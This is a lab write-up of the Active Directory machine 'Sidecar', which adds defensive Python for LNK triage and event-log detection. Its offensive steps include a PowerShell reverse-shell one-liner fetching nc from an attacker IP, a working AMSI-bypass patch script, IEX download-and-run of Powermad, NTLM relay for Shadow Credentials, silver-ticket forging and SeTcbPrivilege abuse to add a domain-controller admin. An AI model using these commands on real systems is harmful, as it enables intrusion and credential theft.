Sidecar, an AD chain machine similar to Intercept, involved getting a shell through an LNK file, relaying authentication from WS01 (after enabling the WebDAV
service) and performing Shadow Credentials to become local admin, password spraying and logging into DC01, where the user had SeTcbPrivilege,
which was used for escalating to domain admin.
DC01.Sidecar.vl
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-25 17:18:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: Sidecar.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.Sidecar.vl, DNS:Sidecar.vl, DNS:SIDECAR
| Issuer: commonName=Sidecar-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-10T15:56:40
| Not valid after: 2024-12-09T15:56:40
| MD5: 62c47cef2e582ad7f5f891a6b9702ba6
|_SHA-1: b6de4e43affd1d6bef93178d2b930940b60f7c96
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: Sidecar.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.Sidecar.vl, DNS:Sidecar.vl, DNS:SIDECAR
| Issuer: commonName=Sidecar-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-10T15:56:40
| Not valid after: 2024-12-09T15:56:40
| MD5: 62c47cef2e582ad7f5f891a6b9702ba6
|_SHA-1: b6de4e43affd1d6bef93178d2b930940b60f7c96
3268/tcp open ldap Microsoft Windows Active Directory LDAP
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: Sidecar.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.Sidecar.vl, DNS:Sidecar.vl, DNS:SIDECAR
| Issuer: commonName=Sidecar-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-10T15:56:40
| Not valid after: 2024-12-09T15:56:40
| MD5: 62c47cef2e582ad7f5f891a6b9702ba6
|_SHA-1: b6de4e43affd1d6bef93178d2b930940b60f7c96
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.Sidecar.vl
WS01.Sidecar.vl
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 10 Enterprise 10240 microsoft-ds (workgroup: SIDECAR)
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2024-02-25T17:19:47+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=ws01.Sidecar.vl
| Issuer: commonName=ws01.Sidecar.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-12-01T14:50:58
| Not valid after: 2024-06-01T14:50:58
| MD5: bf95054282951a4ae25f660daffd32e6
|_SHA-1: 13534e4043fc6a14dd761489803358e0306608ba
| rdp-ntlm-info:
| Target_Name: SIDECAR
| NetBIOS_Domain_Name: SIDECAR
| NetBIOS_Computer_Name: WS01
| DNS_Domain_Name: Sidecar.vl
| DNS_Computer_Name: ws01.Sidecar.vl
| DNS_Tree_Name: Sidecar.vl
| Product_Version: 10.0.10240
|_ System_Time: 2024-02-25T17:19:37+00:00
We can enumerate users right off the bat with lookupsid by specifying the guest account with a null password:
lookupsid.py guest@DC01.sidecar.vl 10000
From here we can try AS-REP roasting using GetNPUsers, but we get nothing.
PORT 445 (SMB)
On DC01, we can access the Public share with anonymous login. Only the Common directory is accessible, which has a few shortcut files.
We can upload a malicious LNK to coerce authentication from the user who'll open this file; the LNK file can be created manually from Windows.
Uploading it and running Responder gives us a hash. However, this hash cannot be cracked.
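From the defender's side, the cheap control for this foothold is to triage shortcut files sitting in writable shares before a user renders them. The following is an added example, not part of this writeup: a minimal parser for the ShellLink (.lnk) format (header, skipped LinkTargetIDList, LocalBasePath from LinkInfo, and the StringData sections) plus a triage rule that flags shortcuts whose target is a script host, whose arguments fetch something remote, or whose icon lives on a UNC path. The script-host and argument keyword lists are my assumptions; the sample shortcut is constructed in code, reusing the Invoke-WebRequest command line and IP from this writeup, and is not a file from the lab.

```python
import os
import struct
from dataclasses import dataclass, field

LNK_HEADER_SIZE = 0x4C                                             # fixed ShellLink header length
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")      # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits (MS-SHLLINK 2.1.1): which optional sections follow the header.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections come in this fixed order, each present only if its flag is set.
STRING_DATA_ORDER = [("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                     ("arguments", 0x20), ("icon_location", 0x40)]
# Hypothetical triage lists (assumptions, not from the writeup).
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta", "rundll32", "regsvr32")
REMOTE_HINTS = ("http://", "https://", "\\\\", "invoke-webrequest", "downloadstring", "iex ")


@dataclass
class LnkInfo:
    flags: int
    strings: dict = field(default_factory=dict)


def parse_lnk(data: bytes) -> LnkInfo:
    """Validate the header, skip the ID list, take LocalBasePath from LinkInfo, read StringData."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short for a ShellLink header")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    info, pos = LnkInfo(flags=flags), LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # absolute target as a PIDL; size-prefixed, skipped here
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:                    # size, header size, flags, VolumeID offset, LocalBasePath offset
        li_size, _hdr, li_flags, _vol_off, base_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 0x1:                       # VolumeIDAndLocalBasePath: null-terminated ANSI path
            start = pos + base_off
            info.strings["local_base_path"] = data[start:data.index(b"\x00", start)].decode("cp1252")
        pos += li_size
    unicode = bool(flags & IS_UNICODE)
    for key, bit in STRING_DATA_ORDER:
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, pos)   # character count, no terminator
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated {key} string")
        pos += nbytes
        info.strings[key] = raw.decode("utf-16-le" if unicode else "cp1252")
    return info


def triage_lnk(data: bytes) -> list:
    """Reasons a shortcut deserves review; an empty list means nothing looked odd."""
    s, findings = parse_lnk(data).strings, []
    target = " ".join(s.get(k, "") for k in ("local_base_path", "relative_path")).lower()
    if any(h in target for h in SCRIPT_HOSTS):
        findings.append(f"target is a script host: {s.get('local_base_path') or s.get('relative_path')}")
    if any(h in s.get("arguments", "").lower() for h in REMOTE_HINTS):
        findings.append("arguments reference a remote location or a download primitive")
    if s.get("icon_location", "").startswith("\\\\"):
        findings.append("icon on a UNC path: Explorer authenticates there just by listing the folder")
    return findings


def scan_share(root: str) -> dict:
    """Walk a mounted share; map every flagged .lnk path to its findings."""
    flagged = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in (n for n in files if n.lower().endswith(".lnk")):
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                hits = triage_lnk(fh.read())
            if hits:
                flagged[path] = hits
    return flagged


def build_sample_lnk(local_base_path: str, relative_path: str, arguments: str) -> bytes:
    """Constructed test input: the smallest ShellLink layout that exercises the parser branches above."""
    flags = HAS_LINK_INFO | 0x08 | 0x20 | IS_UNICODE              # LinkInfo + RelativePath + Arguments
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID, flags).ljust(LNK_HEADER_SIZE, b"\x00")
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"  # fixed drive, empty label
    path_b = local_base_path.encode("cp1252") + b"\x00"
    base_off = 0x1C + len(volume_id)
    suffix_off = base_off + len(path_b)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 0x1, 0x1C, base_off, 0, suffix_off)
    link_info += volume_id + path_b + b"\x00"                       # empty CommonPathSuffix

    def sd(text):                                                  # StringData: count prefix + UTF-16LE
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + link_info + sd(relative_path) + sd(arguments)


if __name__ == "__main__":
    sample = build_sample_lnk(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"..\..\powershell.exe",
                              "-c Invoke-WebRequest -Uri 10.8.0.136 -OutFile C:/Windows/Temp/test")
    print(triage_lnk(sample))
```

Run it against a mounted copy of the share with `scan_share("/mnt/public")` to get a path-to-findings map; the parser deliberately skips the LinkTargetIDList, so a shortcut that carries its target only as a PIDL and has no LinkInfo or RelativePath will parse but yield no target to judge.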
Gaining shell as E.Klaymore
But we don't need to crack this hash or relay it, as we can execute commands from the LNK file; we can try making a request to our Python web server:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c Invoke-WebRequest -Uri 10.8.0.136 -OutFile C:/Windows/Temp/test
Now testing to get a shell with nc:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c Invoke-WebRequest -Uri 10.8.0.136/nc64.exe -OutFile C:/Windows/Temp/nc.exe;C:/windows/Temp/nc.exe 10.8.0.136 2222 -e powershell.exe
From this we do get a connection back, but commands don't run; most probably the host has AV enabled.
To bypass this, I used a Havoc payload, generated raw shellcode with donut and obfuscated it through ScareCrow:
donut -i payload.exe -a x64 -o payload.bin
ScareCrow -I ./payload.bin --domain microsoft.com
On Havoc we'll get a beacon as E.Klaymore; running whoami /all to check the privileges.
Here we can utilize dotnet inline-execute to execute .NET binaries in the beacon's memory:
dotnet inline-execute /opt/AD-Windows-Enum/SharpHound.exe "-c all"
After downloading it with download, we can find this archive in Havoc's loot folder.
From e.klaymore we don't see any path for escalation.
Using GetWebDAVStatus we can verify whether the WebClient (WebDAV) service is enabled.
Even though it shows it's not enabled, we can still explicitly enable it by mapping a drive to our IP address (with Responder running):
shell "net use h: http://10.8.0.136/"
Performing Shadow Credentials through NTLM Relay
We now have WebDAV enabled on WS01. To receive authentication from WS01 we can use any PoC for coercion; we also need to add a DNS record for our IP, as this can only be done from domain-joined machines, and for that we can use Powermad.ps1.
For bypassing AMSI we can use this script:
# Builds a delegate type at runtime so an unmanaged function pointer can be invoked from PowerShell
function getDelegateType {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
        [Parameter(Position = 1)] [Type] $delType = [Void]
    )
    $type = [AppDomain]::CurrentDomain.
        DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
        DefineDynamicModule('InMemoryModule', $false).
        DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $type.
        DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).
        SetImplementationFlags('Runtime, Managed')
    $type.
        DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
        SetImplementationFlags('Runtime, Managed')
    return $type.CreateType()
}
# LookupFunc (resolves an exported function's address by module and name) is not part of this
# snippet and must be defined before running it; see the AMSI bypass reference at the end.
# The function name is split so the string does not appear whole in the script.
$a="A"
$b="msiS"
$c="canB"
$d="uffer"
[IntPtr]$funcAddr = LookupFunc amsi.dll ($a+$b+$c+$d)
$oldProtectionBuffer = 0
# Make the first bytes of the function writable (0x40 = PAGE_EXECUTE_READWRITE)
$vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])))
$vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer)
# Overwrite the function prologue with the 12-byte patch
$buf = [Byte[]] (0xb8,0x34,0x12,0x07,0x80,0x66,0xb8,0x32,0x00,0xb0,0x57,0xc3)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 12)
# Using powermad to add DNS record for our IP
IEX(New-Object Net.WebClient).downloadString('http://10.8.0.136/Powermad.ps1')
New-ADIDNSNode -Tombstone -Verbose -Node * -Data 10.8.0.136
Using SpoolSample for coercion (as it's built with .NET we can run it using dotnet inline-execute), confirming we are getting the NTLMv2 challenge-response from WS01$:
dotnet inline-execute /opt/AD-Windows-Enum/SpoolSample.exe 10.10.183.214 WIN-KINFFE92UBV@80/test
Disabling HTTP, SMB and LDAP on Responder so that we can use ntlmrelayx to relay the WS01 authentication for performing Resource-Based Constrained Delegation (RBCD):
ntlmrelayx.py -t ldaps://DC01.sidecar.vl --delegate-access -smb2support
We are successful in relaying the authentication from WS01, but this wasn't able to create a machine account and perform the delegation. Enumerating ms-DS-MachineAccountQuota with StandIn, a .NET binary for enumerating AD:
dotnet inline-execute /opt/AD-Windows-Enum/StandIn_v13_Net45.exe --object ms-DS-MachineAccountQuota=*
The property value is 0, so we cannot create a machine account and RBCD fails here, but it is still possible to utilize the coercion from WS01$ if ADCS is installed in the domain.
Having verified the presence of an ADCS server, we can perform Shadow Credentials by adding a certificate to the msDS-KeyCredentialLink property of the WS01$ account for alternate authentication using PKINIT. This feature isn't in the current ntlmrelayx repo, so switching to the shadowcredentials branch:
ntlmrelayx.py -t ldaps://DC01.sidecar.vl --shadow-credentials --shadow-target 'WS01$'
Impersonating as local admin on WS01
Through PKINITtools we can get the TGT and NT hash for WS01$:
python3 /opt/PKINITtools/gettgtpkinit.py -cert-pfx 3cIlkuYb.pfx -pfx-pass Fc0RJ71jot050cNh4MJi sidecar.vl/'WS01$' 3cIlkuYb.ccache
python3 /opt/PKINITtools/getnthash.py -key '040534a41a4b07cdaf0082333e26aa693a9eb4897f171df1b94eb66be40a0dd3' sidecar.vl/'WS01$'
To impersonate the local admin on WS01, creating a silver ticket with ticketer.py:
ticketer.py -domain-sid S-1-5-21-3976908837-939936849-1028625813 -domain sidecar.vl -spn HOST/WS01.sidecar.vl -nthash 40************24 -user-id 500 Administrator
secretsdump.py 'administrator'@WS01.Sidecar.vl -k -no-pass
Using smbexec.py we can get a shell on WS01.
Password spraying on svc_deploy
Moving forward, we have Deployer, which resembles the domain user svc_deploy, which has permissions to log in to DC01.
Through CrackStation we can recover Deployer's password and reuse it on svc_deploy.
Checking the privileges, this user has SeTcbPrivilege enabled.
This privilege can be used for creating access tokens and acting as any user without needing their credentials, or running processes as SYSTEM; for this we use the PoC from antonioCoco.
Compiling this PoC through Visual Studio with a Release build.
To abuse this we can create a new user and make them a local administrator on the DC:
SeTcbPrivilege.exe UwU "C:\Windows\System32\cmd.exe /c net user arz P@ssw0rd /add && net localgroup administrators arz /add"
Now we can just log in again through WinRM.
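Every step of the chain from enabling WebDAV on WS01 to the SeTcbPrivilege abuse on DC01 leaves a distinct Windows event behind. The following is an added example, not from this writeup, of detection logic a defender could run over exported Security and System event records: System 7036 (WebClient entering the running state), Security 5136 (a "value added" write to msDS-KeyCredentialLink or msDS-AllowedToActOnBehalfOfOtherIdentity, with the relay signature of an account writing to its own object), 4768 with pre-authentication type 16 (PKINIT) for a machine account, 4672 reporting SeTcbPrivilege for an ordinary user logon, and a 4720 user creation followed within minutes by a 4732 addition to Administrators. These event IDs and field names are standard; 5136 only fires when Directory Service Changes auditing and a SACL on the computer objects are in place, which is assumed here. The sample records are constructed to mirror the chain (names follow the writeup; timestamps, SIDs and layout are made up) and are not logs from the lab.

```python
from datetime import datetime, timedelta

# Constructed sample records shaped like Security/System events exported to JSON (not lab logs).
SAMPLE_EVENTS = [
    {"EventID": 7036, "Channel": "System", "Computer": "WS01.sidecar.vl", "TimeCreated": "2024-02-25T18:01:10",
     "Data": {"param1": "WebClient", "param2": "running"}},
    {"EventID": 5136, "Channel": "Security", "Computer": "DC01.sidecar.vl", "TimeCreated": "2024-02-25T18:05:42",
     "Data": {"SubjectUserName": "WS01$", "ObjectDN": "CN=WS01,CN=Computers,DC=sidecar,DC=vl",
              "ObjectClass": "computer", "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
              "OperationType": "%%14674"}},                          # %%14674 = Value Added
    {"EventID": 4768, "Channel": "Security", "Computer": "DC01.sidecar.vl", "TimeCreated": "2024-02-25T18:06:05",
     "Data": {"TargetUserName": "WS01$", "PreAuthType": "16", "IpAddress": "10.8.0.136"}},
    {"EventID": 4672, "Channel": "Security", "Computer": "DC01.sidecar.vl", "TimeCreated": "2024-02-25T18:06:07",
     "Data": {"SubjectUserName": "DC01$", "PrivilegeList": "SeTcbPrivilege\n\t\t\tSeSecurityPrivilege"}},
    {"EventID": 4672, "Channel": "Security", "Computer": "DC01.sidecar.vl", "TimeCreated": "2024-02-25T19:12:00",
     "Data": {"SubjectUserName": "svc_deploy", "PrivilegeList": "SeTcbPrivilege\n\t\t\tSeChangeNotifyPrivilege"}},
    {"EventID": 4720, "Channel": "Security", "Computer": "DC01.sidecar.vl", "TimeCreated": "2024-02-25T19:14:30",
     "Data": {"SubjectUserName": "svc_deploy", "TargetUserName": "arz", "TargetSid": "S-1-5-21-0-0-0-1105"}},
    {"EventID": 4732, "Channel": "Security", "Computer": "DC01.sidecar.vl", "TimeCreated": "2024-02-25T19:14:31",
     "Data": {"SubjectUserName": "svc_deploy", "MemberSid": "S-1-5-21-0-0-0-1105",
              "TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544"}},
]

# Attributes whose "value added" on a computer object hands control of that account to the writer.
SENSITIVE_ATTRS = {
    "msDS-KeyCredentialLink": "shadow credentials: a PKINIT key was linked to the account",
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "resource-based constrained delegation was granted",
}
BUILTIN_SUBJECTS = {"SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE"}
ADMINISTRATORS_SID = "S-1-5-32-544"


def is_builtin(name: str) -> bool:
    """Machine accounts and service identities legitimately log on with SeTcbPrivilege; users normally don't."""
    return name.endswith("$") or name.upper() in BUILTIN_SUBJECTS


def rdn_account(object_dn: str) -> str:
    """'CN=WS01,CN=Computers,...' -> 'WS01$' so a self-write by a relayed machine can be spotted."""
    return object_dn.split(",", 1)[0].split("=", 1)[1] + "$"


def detect(events, window=timedelta(minutes=10)):
    """Run the chain's detections over event records; returns (rule, host, detail) tuples."""
    findings, new_users = [], {}                     # new_users: TargetSid -> (creator, time) from 4720
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        eid, host, d = ev["EventID"], ev["Computer"], ev["Data"]
        when = datetime.fromisoformat(ev["TimeCreated"])
        if eid == 7036 and d.get("param1") == "WebClient" and d.get("param2") == "running":
            findings.append(("webclient-started", host, "WebDAV client started; HTTP NTLM can now be coerced from this host"))
        elif eid == 5136 and d.get("AttributeLDAPDisplayName") in SENSITIVE_ATTRS and d.get("OperationType") == "%%14674":
            detail = SENSITIVE_ATTRS[d["AttributeLDAPDisplayName"]]
            if d.get("SubjectUserName") == rdn_account(d.get("ObjectDN", "CN=?")):
                detail += " (account wrote to itself: relayed-authentication signature)"
            findings.append(("sensitive-attribute-write", host, detail))
        elif eid == 4768 and d.get("PreAuthType") == "16" and d.get("TargetUserName", "").endswith("$"):
            findings.append(("pkinit-machine-account", host, f"{d['TargetUserName']} got a TGT with a certificate from {d.get('IpAddress')}"))
        elif eid == 4672 and "SeTcbPrivilege" in d.get("PrivilegeList", "") and not is_builtin(d.get("SubjectUserName", "")):
            findings.append(("setcb-user-logon", host, f"{d['SubjectUserName']} logged on holding SeTcbPrivilege"))
        elif eid == 4720:
            new_users[d.get("TargetSid")] = (d.get("SubjectUserName"), when)
        elif eid == 4732 and d.get("TargetSid") == ADMINISTRATORS_SID:
            created = new_users.get(d.get("MemberSid"))
            if created and when - created[1] <= window:
                findings.append(("new-user-to-admins", host, f"{created[0]} created an account and added it to Administrators within {window}"))
    return findings


if __name__ == "__main__":
    for rule, host, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:26} {host:16} {detail}")
```

The 4672 filter is the noisy one in practice: on a DC every machine-account and SYSTEM logon carries SeTcbPrivilege, so the rule only fires for subjects that are neither a computer account nor a built-in identity, which is exactly the case the chain above produced.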
References
- https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/living-off-the-land
- https://pikaroot.github.io/_blogs/2023-02-25-HAVOC_Framework
- https://assume-breach.medium.com/home-grown-red-team-getting-system-on-windows-11-with-havoc-c2-cc4bb089d22
- https://github.com/G0ldenGunSec/GetWebDAVStatus
- https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/adidns-spoofing
- https://github.com/senzee1984/Amsi_Bypass_In_2023
- https://github.com/jtmpu/PrecompiledBinaries
- https://github.com/FuzzySecurity/StandIn/releases/download/v1.3/StandIn_v13_Net35_45.zip
- https://github.com/ShutdownRepo/impacket/tree/shadowcredentials
- https://github.com/med0x2e/NTLMRelay2Self/tree/main
- https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations
- https://gist.github.com/antonioCoco/19563adef860614b56d010d92e67d178